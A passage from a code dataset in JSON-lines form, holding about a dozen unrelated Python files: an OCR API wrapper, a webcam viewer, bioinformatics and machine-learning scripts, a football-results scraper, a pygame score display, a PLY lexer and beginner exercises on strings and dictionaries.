json.loads(r.text, encoding='utf-8')\n if rsp['RetCode'] != 0:\n print(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n uai_logger.error(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n return False, rsp\n else:\n print(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n uai_logger.info(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n return True, rsp\n\n","sub_path":"uai-ocr-sdk/api/base_datastream_api.py","file_name":"base_datastream_api.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"272681632","text":"import cv2\nimport numpy as np\n\nCam = cv2.VideoCapture(0)\n\nif None == Cam:\n\tprint(\"No cam\")\n\texit()\n\nwhile(True):\n\tRet, Frame = Cam.read()\n\tcv2.imshow(\"Frame\", cv2.flip(Frame, 1))\n\t\n\tKey = cv2.waitKey(30) & 0xff \n\tif Key == ord('q'):\n\t\tbreak\n\nCam.release()\ncv2.destroyAllWindows()\n","sub_path":"HCI2017_HW/HW5/HCIByCV.py","file_name":"HCIByCV.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124826034","text":"#!/usr/bin/env python3\n\n#python3 p_dist_.py gene-peak-file gene-p-val-file outFile\n\n\nimport sys\nfrom bisect import insort\nfrom scipy.stats import ranksums\n\n\n\n\npeaksFile = open(sys.argv[1], \"r\")\nfgGenes = set()\nfor line in peaksFile:\n tokens = line.strip().split()\n peak = tokens[3]\n gene = tokens[7]\n fgGenes.add(gene)\npeaksFile.close()\n\nfgPvals = []\nbgPvals = []\npValFile = open(sys.argv[2], \"r\")\npValFile.readline()\nfor line in pValFile:\n tokens = line.strip().split(\"\\t\")\n gene = tokens[0].replace(\"\\\"\", \"\")\n if tokens[3] == \"NA\":\n continue\n p = float(tokens[3])\n if gene in fgGenes:\n insort(fgPvals, p)\n else:\n insort(bgPvals, p)\npValFile.close()\n\nprint(len(fgPvals), len(bgPvals))\n\nprint(ranksums(fgPvals, bgPvals, \"less\"))\n\noutFile = open(sys.argv[3], \"w\")\noutFile.write(\"pval,fg\\n\")\nfor pval in fgPvals:\n outFile.write(str(pval) + \",T\\n\")\nfor pval in bgPvals:\n outFile.write(str(pval) + \",F\\n\")\noutFile.close()\n\n","sub_path":"evaluationScriptsEnhancerPhenotypeAssociations/p_dist_collect_gene.py","file_name":"p_dist_collect_gene.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"279555741","text":"'''\ntest_word_bag_3 with decreased memory overload\n'''\nimport sys\n\nfrom pathlib import Path\nfrom datetime import datetime\nname = Path(__file__).stem\n\nargs_list = [\n '--train', 'train_video_dataset_1_rgb_fast', 'transform_train_1', 'val2vl', 'video_random_2',\n '--test', 'test_video_dataset_1_rgb_fast', 'transform_test_1', 'val2vl', 'video_uniform_2',\n '--model', 'resnet18_word_bag',\n '--optimizer', 'sgd_1',\n '--scheduler', 'scheduler_4',\n '--num-epoch', \"15\",\n '--tensorboard-comment', name,\n '--checkpoint-name', f'{name}_{datetime.now()}.pth',\n]\n\nprint(\"sys.argv before\", sys.argv)\nsys.argv = [sys.argv[0]] + args_list\nprint(\"sys.argv after\", sys.argv)\n\nimport video_yyz.train\n\n'''\nnew\n\nTest: Total time: 0:06:49\n * Test Clip Acc@1 85.587\n100%|███████████████████████████████████████████████████████████████████████████████████| 15/15 [5:54:38<00:00, 1418.59s/it]\nTraining time 5:54:38\n\nnew (reshuffled) \nExpect low score to prove it's possible to prevent overfitting\n\nTest: Total time: 0:09:13\n * Test Clip Acc@1 48.656\n100%|███████████████████████████████████████████████████████████████████████████████████| 15/15 [5:53:07<00:00, 1412.50s/it]\nTraining time 5:53:07\n'''","sub_path":"video_yyz/exps/test_word_bag_6.py","file_name":"test_word_bag_6.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"5973045","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport pandas as pd\nimport time\n\ndiv = 'sw1'\n\nurl = 'https://footystats.org/norway/first-division/fixtures#2012'#'https://footystats.org/sweden/division-1/fixtures'\n\npage = requests.get(url, headers={\"User-Agent\": \"Requests\"})\n\nsoup = BeautifulSoup(page.text, 'html.parser')\n\nmatch_tables = soup.findAll(class_=\"matches-table inactive-matches\")\n\nmatches_data = []\n\nfor match in match_tables:\n\n for completed_match in match.findAll(class_=\"match complete\"):\n\n if completed_match is not None:\n date = datetime.fromtimestamp(int(completed_match.find(class_=\"date convert-months\")['data-time']))\n date = date.strftime('%Y-%m-%d')\n score = completed_match.find(class_=\"bold ft-score\").text.split(\" - \")\n home_goals = score[0]\n away_goals = score[1]\n\n home_team = completed_match.find(class_=\"team-home\").text\n away_team = completed_match.find(class_=\"team-away\").text\n\n matches_data.append([div,date,home_team,away_team,home_goals,away_goals])\n print(f'{date} {home_team} {home_goals} - {away_goals} {away_team}')\n\n# matches_df = pd.DataFrame(matches_data,columns=['Div','Date','HomeTeam','AwayTeam','FTHG','FTAG'])\n#\n# print(matches_df)\n","sub_path":"obscure_leagues.py","file_name":"obscure_leagues.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"332183501","text":"from modules.server import MyHTTPServer\nfrom modules import log_util as lu\nimport sys, time\n\n\nif __name__ == \"__main__\":\n lu.init_log_config('httpd', is_write_log_file=True, log_path=\"./log\")\n daemon = MyHTTPServer()\n if len(sys.argv) == 2:\n lu.logger.info('http.main():: {} {}'.format(sys.argv[0], sys.argv[1]))\n\n if 'start' == sys.argv[1]:\n daemon.start()\n elif 'stop' == sys.argv[1]:\n daemon.stop()\n elif 'restart' == sys.argv[1]:\n daemon.restart()\n elif 'status' == sys.argv[1]:\n daemon.status()\n else:\n print(\"Unknown command\")\n sys.exit(2)\n sys.exit(0)\n else:\n lu.logger.warning('show cmd deamon usage')\n lu.logger.warning(\"Usage: {} start|stop|restart\".format(sys.argv[0]))\n sys.exit(2)\n\n","sub_path":"httpd_daemon.py","file_name":"httpd_daemon.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"180918177","text":"import tensorflow as tf\nimport os\nimport time\nfrom tensorflow.examples.tutorials.mnist import input_data\nstartTime = time.time()\ndef elapsedTime():\n time = time.time() - startTime\n print(str(int(time/3600))+\"hrs\")\n print(str(int(time/60%60))+\"min\")\n print(str(int(time%60))+\"sec\")\nprint(\"\\t+-----Welcome to the MNIST Neural Network-----+\\n\\n\")\nnetworkName = \"1HL-Conv\"\nmnist = input_data.read_data_sets(\"MNIST_data\", one_hot=True)\nprint(\"\\t>> DATA IMPORT COMPLETE <<\\n\")\n\nsess = tf.InteractiveSession()\n\n#multi-run handling\nlogs_path = \"\"\nfor i in range(1000):\n deflogs_path = \"/tmp/mnist/\" + (\"{1}: run{0}\".format(i,networkName))\n if os.path.isdir(deflogs_path) != True:\n logs_path = deflogs_path\n break\n\nwith tf.name_scope(\"inputs\"):\n inp = tf.placeholder(tf.float32, shape=[None,784]) \n output_ = tf.placeholder(tf.float32, shape=[None,10])\n\ndef conv2d(x, W):\n \"\"\"conv2d returns a 2d convolution layer with full stride.\"\"\"\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n \"\"\"max_pool_2x2 downsamples a feature map by 2X.\"\"\"\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef weight_variable(shape):\n \"\"\"weight_variable generates a weight variable of a given shape.\"\"\"\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n \"\"\"bias_variable generates a bias variable of a given shape.\"\"\"\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\n\nwith tf.name_scope('reshape'):\n inp_image = tf.reshape(inp, [-1, 28, 28, 1])\n\n # First convolutional layer - maps one grayscale image to 32 feature maps.\nwith tf.name_scope('conv1'):\n W_conv1 = weight_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n h_conv1 = tf.nn.relu(conv2d(inp_image, W_conv1) + b_conv1)\n\n# Pooling layer - downsamples by 2X.\nwith tf.name_scope('pool1'):\n h_pool1 = max_pool_2x2(h_conv1)\n\n# Second convolutional layer -- maps 32 feature maps to 64.\nwith tf.name_scope('conv2'):\n W_conv2 = weight_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\n# Second pooling layer.\nwith tf.name_scope('pool2'):\n h_pool2 = max_pool_2x2(h_conv2)\n\n# Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image\n# is down to 7x7x64 feature maps -- maps this to 1024 features.\nwith tf.name_scope('fc1'):\n W_fc1 = weight_variable([7 * 7 * 64, 1024])\n b_fc1 = bias_variable([1024])\n\n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n# Dropout - controls the complexity of the model, prevents co-adaptation of\n# features.\nwith tf.name_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n# Map the 1024 features to 10 classes, one for each digit\nwith tf.name_scope('fc2'):\n W_fc2 = weight_variable([1024, 10])\n b_fc2 = bias_variable([10])\n\noutput = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\n\n\nwith tf.name_scope(\"costFunction\"):\n costFunc = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels = output_, logits = output ))\nwith tf.name_scope('train'):\n train_step = tf.train.AdamOptimizer(0.001).minimize(costFunc)\nsess.run(tf.global_variables_initializer())\n\n#Acccuracy management\nwith tf.name_scope('accuracyFunction'):\n with tf.name_scope('correct_prediction'):\n correct_prediction = tf.equal(tf.argmax(output,1), tf.argmax(output_,1))\n with tf.name_scope('accuracy'):\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n#Tensorboard logger\nwriter = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph())\ntf.summary.scalar(\"cost\", costFunc)\ntf.summary.scalar(\"accuracy\", accuracy)\nmerged = tf.summary.merge_all()\n\n#training loop\nfor t in range(1,1000):\n batch = mnist.train.next_batch(100)\n train_step.run(feed_dict={inp: batch[0], output_: batch[1], keep_prob: 0.5})\n writer.add_summary(merged.eval(feed_dict={inp: batch[0], output_: batch[1], keep_prob: 1.0}),t)\n if t % 100 == 0:\n print(\"\\n\\nBatch {} completed\".format(t))\nprint(\"\\n\\t+-----Done training-----+\\n\\n\")\n\n\npercent = accuracy.eval(feed_dict={inp: mnist.test.images, output_: mnist.test.labels, keep_prob: 1.0})\n\nprint(\"Accuracy: {}%\".format(percent*100))","sub_path":"2-convolution-mnist.py","file_name":"2-convolution-mnist.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"61712460","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport argparse\nimport scipy.stats\nimport itertools\n\nparser = argparse.ArgumentParser(description='Computes a dissimilarity matrix.')\nparser.add_argument('otu_table_fn', metavar='OTU_TABLE_FN', help='input OTU table filename')\nparser.add_argument('out_fn', metavar='MATRIX_FN', help='dissimilarity matrix filename')\nparser.add_argument('--method', metavar='METHOD', help='dissimilarity function (options: euclidean [default], correlation)', default='euclidean')\nargs = parser.parse_args()\n\ndissimilarity_functions = { \\\n 'euclidean': lambda x, y: np.linalg.norm(x - y), \\\n 'correlation': lambda x, y: 1.0 - np.corrcoef(x, y)[0, 1], \\\n 'rootcorrelation': lambda x, y: np.sqrt(1.0 - np.corrcoef(x, y)[0, 1]), \\\n 'spearman': lambda x, y: 1.0 - scipy.stats.spearmanr(x, y)\n}\n\npseudocounts = 0\ntable = np.genfromtxt(args.otu_table_fn, dtype=float)\ntable += pseudocounts\n\n# normalize columns\nif abs(np.sum(table[:, 0]) - 1.0) < 1e-10:\n inp = input(\"It looks like this table is not in relative abundances. Continue? [y/N]\")\n if inp.lower() != \"y\":\n raise RuntimeError(\"Table is not relative abundances\")\n\n# normalize rows\nnormed_table = table / table.sum(axis=1)[:, np.newaxis]\nassert(abs(np.sum(normed_table[0, :]) - 1.0) < 1e-10)\n\nn_otus = table.shape[0]\ndists = np.zeros((n_otus, n_otus))\n\nfor i in range(n_otus):\n for j in range(i, n_otus):\n otui = normed_table[i, :]\n otuj = normed_table[j, :]\n\n D = dissimilarity_functions[args.method](otui, otuj)\n\n dists[i, j] = D\n dists[j, i] = D\n\nnp.savetxt(args.out_fn, dists, delimiter='\\t')\n","sub_path":"get_dissimilarity_matrix.py","file_name":"get_dissimilarity_matrix.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106695845","text":"#dictionary ='key', 'value'\n\nemployee = {\n# key : value\n 'nama' : 'Andy',\n 'usia' : 20,\n 'married' : True,\n 'jabatan' : 'IT engineer',\n 'kendaraan' : ['mobil','motor'],\n 'address' : {\n 'street' : 'jalan mawar',\n 'rt' : 5,\n 'rw' : 2,\n 'zipcode' : 41181,\n 'geo': {\n 'lat' : 12345.2344,\n 'long' : 1233245.123234\n }\n }\n}\nprint(employee)\nprint(\"value dalam key 'nama' adalah:\", employee['nama'])\nprint(\"value dalam key 'kendaraan' adalah: \",employee['kendaraan'])\nprint(\"value dalam key 'kendaraa di index pertama adalah: \",employee['kendaraan'][0])\nprint(\"value dalam key 'address' adalah: \",employee['address'] )\nprint(\"valuse dalam key 'address' adalah: \",employee['address']['street'] )\n\n\n# print(list(employee.keys()))\n# print(list(employee.value())\n\n#memakai .get\nprint(employee.get('nama'))\nprint(employee.get('gaji')) # krn ga ada di dict maka hasil akan 'none'\nprint(employee.get('gaji','key not found')) # gaji tidak ada di dict maka hasilnya akan 'key not found'\n\n# assign value baru ke key yg juga baru\nemployee['gaji'] = 2000000\nprint(employee)\n\n#update value di key yang sudah ada\nemployee['gaji'] = 3000000\nprint(employee)\nemployee['kendaraan'].append ('scooter') # merubah isi value langunsg .append (tidak perlu memangil employee)\n\n# .update untuk mengupdate key dan value\nemployee.update ({'NIK': 92131231, 'BPJS' :10000002121})\nprint(employee)\n\n# .items\nprint(list(employee.items())) # membuat list di setiap item \nprint(list(employee['address'].items()))\nprint(employee['address']['geo'].items())\n\n# mencari value apakah ada di dictionary atau tidak\nprint('cari value 3.000.000 ada atau tidak?: ', 3000000 in employee.values())\n\n# CONTOH mencari value terkecil atau tertinggi di dalam dictionary\nnilai_ujian = {\n 'fisika' : 85,\n 'matematika' : 65,\n 'sejarah' : 70\n}\n\nprint('mata kuliah yang nilainya paling kecil adalah: ',min(nilai_ujian, key=nilai_ujian.get))\nprint('mata kuliah yang nilainya paling besar adalah: ', max(nilai_ujian, key=(nilai_ujian.get)))\n\n# mengganti nama key\nemployee['alamat'] = employee.pop('address') # untuk mengganti dict keys maka diperlukan memanggil employee.pop(tidak bisa lgsg .pop)\nprint(employee)\n\n# menggabungkan 2 dictionary\ndic1 = {'ten' : 10, 'twenty' : 20,'thirty' : 30}\ndic2 = {'forty' : 40, 'fifty' : 50, 'sixty' : 60}\n\n# .update cara1\ndic3 = dic1.copy()\ndic3.update(dic2)\nprint(dic3)\n\n# .update cara2\ndic1_dic2 = {**dic1 , **dic2}\nprint(dic1_dic2)\n\n# zip = untuk menyatukan based om index itterable(list,tuple,set) 1 denga itterable yang lain (memuat 2 buah dictionary dari 2 list)\nkey = ['ten', 'twenty', 'thirty']\nvalue = [10,20,30]\n\nsample_dic = dict(zip(key, value))\nsample_dic_reversed = dict(zip(value,key))\nprint(sample_dic)\nprint(sample_dic_reversed)\n\nsample_list = list(zip(key, value))\nprint('ini sample list' , sample_list)\n\nsample_tuple = tuple(zip(key, value))\nprint(sample_tuple)\n\nsample_dic_test = {*key , *value}\nprint(sample_dic_test)\n\n# memulai/ initialize dictionary dengan default values\nkaryawan = ['doni', 'aryo','brian']\ndefault = {'designation' : 'application developer', 'salary' : 5000000}\n\nres_dic = dict.fromkeys(karyawan, default)\nprint(res_dic)\n\nprint(res_dic['doni'])\n\n#quiz 1\n# hari = input('masukan hari: ').lower()\n# days = {\n# 'senin' : 'sunday',\n# 'selasa' : 'tuesday',\n# 'rabu' : 'wednesday',\n# 'kamis' : 'thursday',\n# 'jumat' : 'friday',\n# 'sabtu' : 'saturday',\n# 'minggu' : 'sunday'\n# }\n# print('bahasa inggris dari',hari.lower(),'adalah: ',days[hari].lower())\n\n#quiz 2\n\n# hari = input('masukan hari (INA/ENG): ')\n# days = {\n# 'senin' : 'monday',\n# 'selasa' : 'tuesday',\n# 'rabu' : 'wednesday',\n# 'kamis' : 'thursday',\n# 'jumat' : 'friday',\n# 'sabtu' : 'saturday',\n# 'minggu' : 'sunday'\n# }\n# INA = list(days.keys())\n# ENG = list(days.values())\n# # print(INA)\n# # print(ENG)\n# if hari in INA:\n# print(f'bahasa inggris dari{hari} adalah: {days[hari]}')\n# elif hari in ENG:\n# print(f'bahasa indonesia dari {hari} adalah: {INA[ENG.index(hari)]}')\n# else:\n# print('adadsdf')","sub_path":"4.dictionary.py","file_name":"4.dictionary.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"186355291","text":"import pygame\nimport math\nimport random\n\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((640, 480))\n\nclass ScoreBoardSprite (pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.alpha = 255\n self.x = 0\n self.y = 0\n self.main_surface = pygame.Surface((220, 50))\n self.surface = self.main_surface\n self.font = pygame.font.SysFont(\"None\", 50)\n self.score_value = 0\n self.score = self.font.render(\"Score: \" + str(self.score_value), 1, (200, 10, 10))\n self.surface.blit(self.score, (self.x, self.y))\n self.image = self.surface\n self.rect = self.image.get_rect()\n\n def update(self):\n self.score = self.font.render(\"Score: \" + str(self.score_value), 1, (200, 10, 10))\n self.surface = self.main_surface\n self.surface.blit(pygame.Surface((220, 50)), (0, 0))\n self.surface.blit(self.score, (self.x, self.y))\n self.image = self.surface\n\n def addPoints(self, value):\n self.score_value = self.score_value + value\n\nclass ScoreSprite (pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.sound = pygame.mixer.Sound('points2.wav')\n self.alpha = 255\n self.x = 320 + random.randint(-25, 25)\n self.y = 240 + random.randint(-25, 25)\n self.surface = pygame.Surface((640, 480))\n self.font = pygame.font.SysFont(\"None\", 50)\n self.score_value = random.randint(10, 175)\n self.score_value = int(5 * round(float(self.score_value)/5))\n\n self.num = random.randint(1, 10)\n self.score = self.font.render(\"+\" + str(self.score_value), 1, (200, 10, 10))\n self.surface.blit(self.score, ((self.x -10), (self.y - 10)))\n self.image = self.surface\n self.rect = self.image.get_rect()\n self.alpha_mod = 1\n self.sound.play()\n\n def update(self):\n if self.alpha > 0:\n self.rect.centery -= 3\n self.alpha -= self.alpha_mod\n elif self.alpha <= 0:\n pygame.sprite.Sprite.kill(self)\n\n self.surface.set_alpha(self.alpha)\n self.image = self.surface\n\nbackground = pygame.Surface(screen.get_size())\nbackground.convert()\n\nbackground.fill((0, 0, 0))\n\nclock = pygame.time.Clock()\nkeep_going = True\nscore = ScoreSprite()\nscore_board = ScoreBoardSprite()\nscore_board.addPoints(score.score_value)\n\nwhile keep_going:\n clock.tick(30)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n keep_going = False\n\n screen.blit(background, (0, 0))\n score_group = pygame.sprite.OrderedUpdates(score)\n score_board_group = pygame.sprite.OrderedUpdates(score_board)\n score_group.update()\n score_board_group.update()\n score_group.draw(screen)\n score_board_group.draw(screen)\n pygame.display.flip()\n\n if score.alpha <= 0:\n alpha_mod = score.alpha_mod\n score = ScoreSprite()\n score_board.addPoints(score.score_value)\n score.alpha_mod = alpha_mod + 1\n if score.alpha_mod > 255:\n score.alpha_mod = random.randint(1, 20)\n","sub_path":"viewport.py","file_name":"viewport.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"594995586","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTests of the objective package\n\"\"\"\n\n# needed for python 3 compatibility\nfrom __future__ import division\nimport os.path\nimport neo\nimport numpy\nimport quantities as pq\n\n# Sometimes it is convenient to run it outside of the unit-testing framework\n# in which case the ng module is not imported\nif __name__ == '__main__':\n from neurotune.utilities import DummyTestCase as TestCase # @UnusedImport\nelse:\n try:\n from unittest2 import TestCase\n except ImportError:\n from unittest import TestCase\nfrom neurotune.objective.spike import (SpikeFrequencyObjective,\n SpikeTimesObjective,\n MinCurrentToSpikeObjective,\n SpikeAmplitudeObjective)\nfrom neurotune.analysis import AnalysedRecordings\ntry:\n from matplotlib import pyplot as plt\nexcept:\n plt = None\n\n\n# Load testing traces into analysed recordings\ndata_dir = os.path.join(os.path.dirname(__file__), '..', '..', 'data',\n 'traces')\nsoma_seg = neo.PickleIO(os.path.join(data_dir, 'purkinje_soma.pkl')).read()\ndend_seg = neo.PickleIO(os.path.join(data_dir, 'purkinje_dendrite.pkl')).read()\nsoma_analysis = AnalysedRecordings(soma_seg)\ndend_analysis = AnalysedRecordings(dend_seg)\nreference = soma_analysis.get_analysed_signal()\navg_reference_amp = numpy.average(reference.spike_amplitudes())\navg_reference_freq = numpy.average(reference.spike_frequency())\n\n\nclass TestObjectiveBase(TestCase):\n\n def test_fitness(self):\n fitnesses = []\n for objective in self.objectives:\n fitnesses.append(objective.fitness(soma_analysis))\n # self.assertEqual(fitnesses, self.target_fitness)\n return fitnesses\n\n\nclass TestSpikeFrequencyObjective(TestObjectiveBase):\n\n target_fitnesses = 0.0\n \n references = numpy.arange(20, 70, 5) * pq.Hz\n\n def setUp(self):\n self.objectives = [SpikeFrequencyObjective(frequency,\n time_start=reference.t_start,\n time_stop=reference.t_stop)\n for frequency in self.references]\n\n\nclass TestSpikeTimesObjective(TestObjectiveBase):\n\n target_fitness = 0.0\n\n def setUp(self):\n self.objective = SpikeTimesObjective(reference.spikes(),\n time_start=reference.t_start,\n time_stop=reference.t_stop)\n\n\nclass TestMinCurrentToSpikeObjective(TestObjectiveBase):\n\n target_fitness = 0.0\n\n def setUp(self):\n self.objective = MinCurrentToSpikeObjective(time_start=reference.t_start,\n time_stop=reference.t_stop)\n\n\nclass TestSpikeAmplitudeObjective(TestObjectiveBase):\n\n target_fitness = 1.0\n\n references = numpy.arange(-20, 30, 5) * pq.mV\n\n def setUp(self):\n self.objectives = [SpikeAmplitudeObjective(amplitude,\n time_start=reference.t_start,\n time_stop=reference.t_stop)\n for amplitude in self.references]\n\"\"\"\nif __name__ == '__main__':\n test = TestSpikeAmplitudeObjective()\n test.setUp()\n fitnesses = test.test_fitness()\n plt.plot(test.references, fitnesses)\n plt.xlabel('Target amplitude (mV)')\n plt.ylabel('Fitness')\n plt.title(\"Objective function (avg. amp.={})\"\n .format(avg_reference_amp))\n plt.show()\n\"\"\"\n\nif __name__ == '__main__':\n test = TestSpikeFrequencyObjective()\n test.setUp()\n fitnesses = test.test_fitness()\n plt.plot(test.references, fitnesses)\n plt.xlabel('Target frequecy (Hz)')\n plt.ylabel('Fitness')\n plt.title(\"Objective function (avg. freq.={})\"\n .format(avg_reference_freq))\n plt.show()","sub_path":"test/unittest/objective/test_spike.py","file_name":"test_spike.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538950094","text":"import ply.lex as lex\n\nreserved = {\n # Value : token\n '__DATA__': '__DATA__',\n '__END__': '__END__',\n '__FILE__': '__FILE__',\n '__LINE__': '__LINE__',\n '__PACKAGE__': '__PACKAGE__',\n 'if': 'IF',\n 'else': 'ELSE',\n 'elsif': 'ELSIF',\n 'for': 'FOR',\n 'foreach': 'FOREACH',\n 'while': 'WHILE',\n 'continue': 'CONTINUE',\n 'CORE': 'CORE',\n 'do': 'DO',\n 'exp': 'EXP',\n 'cmp': 'CMP',\n 'package': 'PACKAGE',\n 'q': 'Q',\n 'qq': 'QQ',\n 'qr': 'QR',\n 'qw': 'QW',\n 'qx': 'QX',\n 'no': 'NO',\n 's': 'S',\n 'sub': 'SUB',\n 'tr': 'TR',\n 'unless': 'UNLESS',\n 'until': 'UNTIL',\n 'lt': 'SLT',\n 'gt': 'SGT',\n 'le': 'SLE',\n 'ge': 'SGE',\n 'eq': 'SEQ',\n 'ne': 'SNE',\n\n}\n\nliterals = ['+', '-', '*', '/', '%', '|', '&', '^', '=', '(', ')', '[', ']', '{', '}', ',', '.', ';', ':', '\\\"']\n\ntokens = [\n 'ID_SC','ID_LI','ID', 'NUMBER',\n # Operators (<<, >>, ||, &&, !, <, <=, >, >=, ==, !=)\n 'LSHIFT', 'RSHIFT',\n 'LOR', 'LAND', 'LNOT',\n 'LT', 'LE', 'GT', 'GE', 'EQ', 'NE',\n\n # Assignment (=, *=, /=, %=, +=, -=, <<=, >>=, &=, ^=, |=)\n 'EQUALS', 'TIMESEQUAL', 'DIVEQUAL', 'MODEQUAL', 'PLUSEQUAL', 'MINUSEQUAL',\n 'LSHIFTEQUAL', 'RSHIFTEQUAL', 'ANDEQUAL', 'XOREQUAL', 'OREQUAL',\n\n # Increment/decrement (++,--)\n 'INCREMENT', 'DECREMENT',\n\n # Ternary operator (?)\n 'TERNARY',\n\n # Reserved words\n # TODO: move for reserved object\n # 'IT', 'M', 'Y'\n\n ] + list(reserved.values())\n\n# Operators\nt_LSHIFT = r'<<'\nt_RSHIFT = r'>>'\nt_LOR = r'\\|\\|'\nt_LAND = r'&&'\nt_LNOT = r'!'\nt_LT = r'<'\nt_GT = r'>'\nt_LE = r'<='\nt_GE = r'>='\nt_EQ = r'=='\nt_NE = r'!='\n\n# Assignment operators\nt_TIMESEQUAL = r'\\*='\nt_DIVEQUAL = r'/='\nt_MODEQUAL = r'%='\nt_PLUSEQUAL = r'\\+='\nt_MINUSEQUAL = r'-='\nt_LSHIFTEQUAL = r'<<='\nt_RSHIFTEQUAL = r'>>='\nt_ANDEQUAL = r'&='\nt_OREQUAL = r'\\|='\nt_XOREQUAL = r'\\^='\n\n\n# Identifiers\ndef t_ID_SC(t):\n r'\\$[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value, 'ID_SC') # Check for reserved words\n return t\n\ndef t_ID_LI(t):\n r'@[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value, 'ID_LI') # Check for reserved words\n return t\n\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value, 'ID') # Check for reserved words\n return t\n\n\n\ndef t_NUMBER(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n\n# Define a rule so we can track line numbers\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n\n# A string containing ignored characters (spaces and tabs)\nt_ignore = ' \\t'\n\n\n# Error handling rule\ndef t_error(t):\n print(\"Illegal character '%s'\" % t.value[0])\n t.lexer.skip(1)\n\n\n# Build the lexer\nlexer = lex.lex()\n\n# Test it out\ndata = '''\n$_a\n@_b\nab\n'''\n\n# Give the lexer some input\nlexer.input(data)\n\nwhile True:\n tok = lexer.token()\n if not tok:\n break\n print(tok.type, tok.value, tok.lineno, tok.lexpos)\n\n# for tok in lexer:\n# print(tok.type, tok.value, tok.lineno, tok.lexpos)\n","sub_path":"application/src/Lexicon/lexico.py","file_name":"lexico.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"574229057","text":"\n#Question 1\n\nauthor = \"Camus\" \nprint(author[0:5])\n\n\n#Question 2\n\nresponse1 = input(\"What did you write:\") \nresponse2 = input(\"Where did you send it:\")\n\nx = \"Yesterday I wrote a {}. I sent it to {}!\".format(response1,response2)\n\nprint(x) \n\n#Question 3\n\ny = \"aldous\".capitalize()\nz = \"Huxley was born in 1894.\"\nx = y + \" \" + z\n\nprint(x)\n\n#Question 4\n\nt = [\"Where now? Who now? When now?\"]\nt[0:2]\n\nprint(t)\n\n#Question 5\n\na = [\"The\", \"fox\", \"who\", \"jumped\", \"over\", \"the\",\"fence.\"]\nb = \" \".join(a)\n\nprint(b)\n\n#Question 6\n\nc = \"A screaming came across the sky.\"\nc = c.replace(\"s\",\"$\")\n\nprint(c)\n\n#Question 7\n\nf = \"Hemingway\"\nprint(f.index(\"m\"))\n\n#Question 8\n\na = \"\\\"It was Indian summer in New Hampshire.\\\"\"\nprint(a)\n\n#Question 9\n\nz = \"three \" * 3\nprint(z)\n\n#Question 10\n\nb = \"It was a bright cold day in April, and the clocks were striking thirteen.\"\nprint(b.index(\",\"))\n\nprint(b[:33])\n\n#End of 